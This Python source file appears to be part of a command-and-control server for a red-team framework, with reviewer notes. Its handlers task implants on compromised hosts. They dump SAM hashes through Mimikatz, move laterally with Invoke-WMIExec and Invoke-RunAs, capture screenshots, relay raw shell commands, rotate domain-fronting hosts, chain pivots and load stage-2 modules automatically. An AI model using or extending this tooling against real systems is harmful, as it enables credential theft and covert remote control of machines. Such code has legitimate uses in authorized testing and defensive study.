def do_rotation(user, command, randomuri):
    """Prompt the operator for rotation hosts and push them to the implant as variables.

    Two interactive prompts collect the rotation URL list and the domain-front
    host list; both are expected in PowerShell array syntax (quoted,
    comma-separated) as the prompt text shows.  Each answer is tasked verbatim
    via ``set-variable``: ``rotdf`` for the fronting hosts, ``rotate`` for
    the URLs.  ``command`` is accepted for handler uniformity but not read.

    NOTE(review): the answers are interpolated unquoted and unvalidated into
    the task string, so the operator is responsible for well-formed syntax.
    NOTE(review): ``input()`` is used — this assumes Python 3; under Python 2
    ``input()`` evaluates the typed text.  Confirm the target interpreter.
    """
    rotate_urls = input('Domain or URL in array format: "https://www.example.com","https://www.example2.com" ')
    front_hosts = input('Domain front URL in array format: "fjdsklfjdskl.cloudfront.net","jobs.azureedge.net" ')
    # Fronting hosts are set first, then the rotation URLs.
    for var_name, value in (("rotdf", front_hosts), ("rotate", rotate_urls)):
        new_task("set-variable -name %s -value %s" % (var_name, value), user, randomuri)
def do_get_rotation(user, command, randomuri):
    """Task the implant to report its rotation settings.

    Issues two ``get-variable`` tasks in order: ``rotdf`` (domain-front hosts)
    then ``rotate`` (rotation URLs).  ``command`` is not read.
    """
    for var_name in ("rotdf", "rotate"):
        new_task("get-variable -name %s" % var_name, user, randomuri)
def do_stopsocks(user, command, randomuri):
    """Forward the stop-socks command line to the implant and clear its label.

    The implant's label is blanked first, then ``command`` is tasked verbatim.
    """
    cleared_label = ""
    update_label(cleared_label, randomuri)
    new_task(command, user, randomuri)
def do_reversedns(user, command, randomuri):
    """Task a DNS host-entry lookup for the name/address on the command line.

    Every case-insensitive occurrence of ``reversedns `` is removed (the
    pattern is unanchored, so not only a leading one) and the remainder is
    dropped into a PowerShell ``[System.Net.Dns]::GetHostEntry("...")`` call.

    NOTE(review): the argument is placed inside a double-quoted PowerShell
    string with no escaping or validation, so a ``"`` — or a ``$``, which
    PowerShell expands inside double quotes — in the operator's input changes
    the expression that executes on the implant.
    """
    target = re.sub("reversedns ", "", command, flags=re.IGNORECASE)
    lookup_expr = '[System.Net.Dns]::GetHostEntry("%s")' % target
    new_task(lookup_expr, user, randomuri)
def do_ps(user, command, randomuri):
    """Task the implant's built-in process listing (``get-processlist``).

    ``command`` is not read; the task string is fixed.
    """
    listing_task = "get-processlist"
    new_task(listing_task, user, randomuri)
def do_hashdump(user, command, randomuri):
    """Dump local SAM hashes through Mimikatz.

    Makes sure ``Invoke-Mimikatz.ps1`` is loaded on the implant, then tasks
    ``lsadump::sam``.  ``command`` is not read — there are no arguments.

    NOTE(review): both the module name and the Mimikatz command are fixed
    here; this touches SAM/LSA on the target, which defensive tooling commonly
    watches for, so treat it as a noisy action.
    """
    mimikatz_module = "Invoke-Mimikatz.ps1"
    check_module_loaded(mimikatz_module, randomuri, user)
    sam_dump = "Invoke-Mimikatz -Command '\"lsadump::sam\"'"
    new_task(sam_dump, user, randomuri)
def do_pbind_loadmodule(user, command, randomuri):
    """Re-issue ``pbind-loadmodule`` with its argument normalised.

    Every case-insensitive occurrence of ``pbind-loadmodule `` is stripped from
    the command line and the remainder is re-prefixed with the lowercase verb,
    so the implant always receives ``pbind-loadmodule <argument>``.  The
    argument itself is passed through unvalidated.
    """
    module_arg = re.sub("pbind-loadmodule ", "", command, flags=re.IGNORECASE)
    new_task("pbind-loadmodule " + module_arg, user, randomuri)
def do_get_screenshot(user, command, randomuri):
    """Task a screenshot on a ``screencapture``-capable (macOS-style) implant.

    The tasked shell line captures to ``/tmp/s``, prints the file
    base64-encoded (that output is the task result) and then removes it.
    ``command`` is not read.

    NOTE(review): ``/tmp/s`` is a fixed, predictable path in a shared
    directory on the target — the image sits on disk in the clear until the
    ``rm``, overlapping captures would reuse the same file, and another local
    user could pre-create or read it.  The three steps are ``;``-chained, so
    each runs regardless of whether the previous one succeeded.
    """
    steps = ("screencapture -x /tmp/s", "base64 /tmp/s", "rm /tmp/s")
    new_task(";".join(steps), user, randomuri)
def do_invoke_wmiexec(user, command, randomuri):
    """Run Invoke-WMIExec with the operator-supplied arguments.

    Loads ``Invoke-WMIExec.ps1`` on the implant if needed, strips every
    case-insensitive ``invoke-wmiexec `` occurrence from the command line and
    re-tasks it as ``invoke-wmiexec <args>``.  Arguments (targets,
    credentials) are forwarded unvalidated.
    """
    check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
    wmi_args = re.sub("invoke-wmiexec ", "", command, flags=re.IGNORECASE)
    new_task("invoke-wmiexec " + wmi_args, user, randomuri)
def do_invoke_runas(user, command, randomuri):
    """Run Invoke-RunAs with the operator-supplied arguments.

    Loads ``Invoke-RunAs.ps1`` on the implant if needed, strips every
    case-insensitive ``invoke-runas `` occurrence from the command line and
    re-tasks it as ``invoke-runas <args>``.  Arguments are forwarded
    unvalidated; any credential material on the command line travels in the
    task string as typed.
    """
    check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
    runas_args = re.sub("invoke-runas ", "", command, flags=re.IGNORECASE)
    new_task("invoke-runas " + runas_args, user, randomuri)
def do_get_implantworkingdirectory(user, command, randomuri):
    """Task ``pwd`` so the implant reports its working directory.

    ``command`` is not read; the task string is fixed.
    """
    cwd_task = "pwd"
    new_task(cwd_task, user, randomuri)
def do_remove_servicelevel_persistence(user, commmand, randomuri):
    """Delete the ``CPUpdater`` service used for service-level persistence.

    Tasks ``sc.exe delete CPUpdater``.  The second parameter is spelled
    ``commmand`` (three m's) and is never read; the name is left as-is so a
    keyword caller, if any, keeps working.

    NOTE(review): the service is deleted without being stopped first; on
    Windows a running service is normally only marked for deletion until it
    stops — confirm whether a stop step is wanted for clean removal.  The
    service name must match the one the install routine registers, which is
    not visible here.
    """
    service_name = "CPUpdater"
    new_task("sc.exe delete %s" % service_name, user, randomuri)
def do_startanotherimplant(user, command, randomuri):
    """Task the implant to spawn a second implant (``startanotherimplant``).

    ``command`` is not read; the task string is fixed.
    """
    spawn_task = "startanotherimplant"
    new_task(spawn_task, user, randomuri)
def do_shell(user, command, randomuri):
    """Pass the raw operator command line straight through as an implant task.

    Nothing is parsed, rewritten or validated: whatever was typed is what the
    implant executes.
    """
    raw_line = command
    new_task(raw_line, user, randomuri)
def do_invoke_daisychain(user, command, randomuri):
    """Task Invoke-DaisyChain with every known C2 URL and mark the implant a daisy host.

    Loads ``Invoke-DaisyChain.ps1`` if needed, appends ``-URLs '<urls>'``
    (``urls`` from ``get_allurls()``) to the operator's command line, tasks
    it, relabels the implant ``DaisyHost`` and prints the next step.

    NOTE(review): the URL list is wrapped in single quotes with no escaping;
    a ``'`` inside any configured URL would break the argument.
    """
    check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
    url_list = get_allurls()
    daisy_cmd = "%s -URLs '%s'" % (command, url_list)
    new_task(daisy_cmd, user, randomuri)
    update_label("DaisyHost", randomuri)
    print("Now use createdaisypayload")
def do_loadpowerstatus(user, command, randomuri):
    """Forward the ``loadpowerstatus`` command line to the implant and tag it ``PSM``.

    The label is applied first, then ``command`` is tasked verbatim.
    """
    power_label = "PSM"
    update_label(power_label, randomuri)
    new_task(command, user, randomuri)
def autoruns(self):
    """Run the post-check-in stage-2 module loads and any stored autorun commands.

    Which modules are loaded depends on ``self.Pivot`` (substring checks, so
    more than one branch can apply):
      * ``C#``: tasks loads of ``Stage2-Core.exe`` and ``PwrStatusTracker.dll``,
        records both, tasks ``loadpowerstatus`` and labels the implant ``PSM``.
      * ``PS``: tasks and records ``Stage2-Core.ps1``.
      * ``PB``: labels the implant ``Parent: <self.IPAddress>``, then
        pbind-loads and records ``Stage2-Core.exe``.
    Afterwards each row returned by ``get_autoruns()`` has ``row[1]`` handed to
    ``run_autoloads`` and then tasked as-is.  Every task is attributed to the
    user ``"autoruns"``.

    NOTE(review): autorun rows are read from storage and tasked without any
    inspection, so whoever can write that table can run commands on every new
    implant — treat it as a privileged configuration surface.
    """
    uri = self.RandomURI
    actor = "autoruns"
    pivot = self.Pivot

    if "C#" in pivot:
        cs_modules = ("Stage2-Core.exe", "PwrStatusTracker.dll")
        # Task both loads first, then record both, then the power-status step.
        for module in cs_modules:
            new_task("loadmodule " + module, actor, uri)
        for module in cs_modules:
            update_mods(module, uri)
        new_task("loadpowerstatus", actor, uri)
        update_label("PSM", uri)

    if "PS" in pivot:
        ps_module = "Stage2-Core.ps1"
        new_task("loadmodule " + ps_module, actor, uri)
        update_mods(ps_module, uri)

    if "PB" in pivot:
        update_label("Parent: %s" % self.IPAddress, uri)
        pb_module = "Stage2-Core.exe"
        new_task("pbind-loadmodule " + pb_module, actor, uri)
        update_mods(pb_module, uri)

    rows = get_autoruns()
    if rows:
        for row in rows:
            stored_cmd = row[1]
            run_autoloads(stored_cmd, uri, actor)
            new_task(stored_cmd, actor, uri)